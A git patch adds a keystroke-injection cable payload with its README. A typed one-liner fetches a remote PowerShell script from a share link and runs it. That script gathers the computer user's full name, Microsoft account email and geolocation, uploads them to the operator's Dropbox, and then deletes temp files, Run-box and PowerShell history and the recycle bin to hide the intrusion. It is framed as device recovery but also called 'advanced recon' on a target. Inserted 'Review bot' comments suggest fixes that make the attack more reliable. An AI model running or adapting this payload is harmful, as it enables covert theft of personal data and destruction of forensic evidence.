From a20015c4a4a5237fdca326000d3f0bb6f62c453c Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Thu, 28 Apr 2022 05:28:03 -0500
Subject: [PATCH] NEW-PayLoad ET-Phone-Home
---
.../ET-Phone-Home-Execute.txt | 14 ++
.../OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 | 151 ++++++++++++++++++
.../OMG-ET-Phone-Home/README.md | 128 +++++++++++++++
3 files changed, 293 insertions(+)
create mode 100644 payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt
create mode 100644 payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1
create mode 100644 payloads/library/incident_response/OMG-ET-Phone-Home/README.md
diff --git a/payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt b/payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt
new file mode 100644
index 0000000..0b3c1d0
--- /dev/null
+++ b/payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt
@@ -0,0 +1,14 @@
+REM this script will download and execute your locator script if your wifi access point is not detected
+REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
+
+REM Replace SSID with name of wifi your computer is connected to
+
+IF_NOT_PRESENT SSID="Home"
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 b/payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1
new file mode 100644
index 0000000..d6edf01
--- /dev/null
+++ b/payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1
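Review bot: The `STRING` line hands whatever the share link currently returns straight to `Invoke-Expression` with no integrity check, so if the link is edited, the Dropbox account is compromised, or Dropbox answers with an HTML error page, that content runs on every host the cable is plugged into, together with the access token embedded in the fetched script. Pinning the payload to a known hash costs one extra clause in the one-liner: `$pl=(iwr <link>?dl=1).Content; if((Get-FileHash -InputStream ([IO.MemoryStream][Text.Encoding]::UTF8.GetBytes($pl))).Hash -eq '<SHA256>'){iex $pl}`. The placeholder `< Your Shared link for the intended file>` contains spaces, so a half-edited link yields a broken command; a `REM the URL must contain no spaces and end in ?dl=1` beside the STRING line would make that explicit. `-Exec Bypass` only relaxes the execution policy and will not get past AppLocker or Constrained Language Mode, which is worth a REM so users do not expect the payload to work on hardened hosts.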
@@ -0,0 +1,151 @@
+
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : OMG-ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
+
+.DESCRIPTION
+ This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
+ This script will get the Name and email associated with the targets microsoft account
+ Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
+
+ #------------------------------------------------------------------------------------------------------------------------------------
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$FN = Get-fullName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$EM = Get-email
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GL = Get-GeoLocation
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+echo $FN >> $env:TMP\$FileName
+echo $EM >> $env:TMP\$FileName
+echo $GL >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+# Upload output file to dropbox
+
+$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
+$TargetFilePath="/$FileName"
+$SourceFilePath="$env:TMP\$FileName"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $DropBoxAccessToken
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/payloads/library/incident_response/OMG-ET-Phone-Home/README.md b/payloads/library/incident_response/OMG-ET-Phone-Home/README.md
new file mode 100644
index 0000000..b09ae68
--- /dev/null
+++ b/payloads/library/incident_response/OMG-ET-Phone-Home/README.md
@@ -0,0 +1,128 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-AcidBurn/logo-170-px.png?raw=true)
+
+
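Review bot: `$DropBoxAccessToken` is a clear-text, long-lived API token inside a script that is served from a public share link and executed on whatever machine the cable lands in, so anyone who reads the link, the RunMRU entry before cleanup, or the process command line obtains write (and, depending on the app's scopes, read) access to the owner's Dropbox; a per-app token scoped to `files.content.write` only, rotated after each recovery, plus a comment such as `# NOTE: this token is exposed to every host the payload runs on - keep its scope minimal` above the assignment would bound that. In `Get-fullName`, `.TrimStart("Full Name")` strips any leading characters drawn from that set rather than the prefix, so a user named "Neal" comes back empty; `$fullName = ("$fullName") -replace '^Full Name\s*', ''` removes only the label. The `while` in `Get-GeoLocation` exits only on `Ready` or `Denied`, so when location services are off the status stays elsewhere and the script never reaches the upload; a bounded wait (a loop counter of ~100 iterations with the same fallback) avoids the hang. The bare `-ErrorAction SilentlyContinue` lines that follow `return` in each catch block are not attached to any command and should be deleted, and `rm $env:TEMP\* -r -Force` wipes the user's entire temp directory when `Remove-Item $SourceFilePath` is all the cleanup needs.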
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+
+
+# OMG ET Phone Home
+
+A script I put together to locate your stolen devices, or your "stolen" baited devices
+
+## Description
+
+This program is meant to locate your devices. Save the execution file on the boot partition of your devices and when someone plugs it into their computer
+Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
+latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
+Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox - Your Shared link for the intended file
+* Windows 7,10,11
+
+

(back to top)

+
+### Executing program
+
+* Your device is plugged into the targets computer
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory if your intended wifi network is not detected with the
+ geofencing options
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+* The OMG device will attempt to detect the Wifi Access point you designated, if it does not..
+* A one liner in the run box will download and execute the ET-Phone-Home Script
+* This script will get the Name and Email associated with the microsoft account of the persons computer your device connected to
+* The latitude and longitude of where the device was when it was activated will also be collected
+* This gathered information will be saved to a text file in the TMP Directory
+* That file will be uploaded to your DropBox cloud storage
+
+Something Like What you see below will be in your cloud storage:
+
+NAME
+
+EMAIL
+
+LATITUDE AND LONGITUDE
+
+```
+Jakoby
+
+jakoby@example.com
+
+ Latitude Longitude
+ -------- ---------
+37.778919 -122.416313
+```
+
+

(back to top)

+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Kalani
+
+
+

(back to top)

+
+## Version History
+
+* 0.1
+ * Initial Release
+
+

(back to top)

+
+
+## Contact
+
+

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG-ET-Phone-Home) +

+ + + +

(back to top)

+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+

(back to top)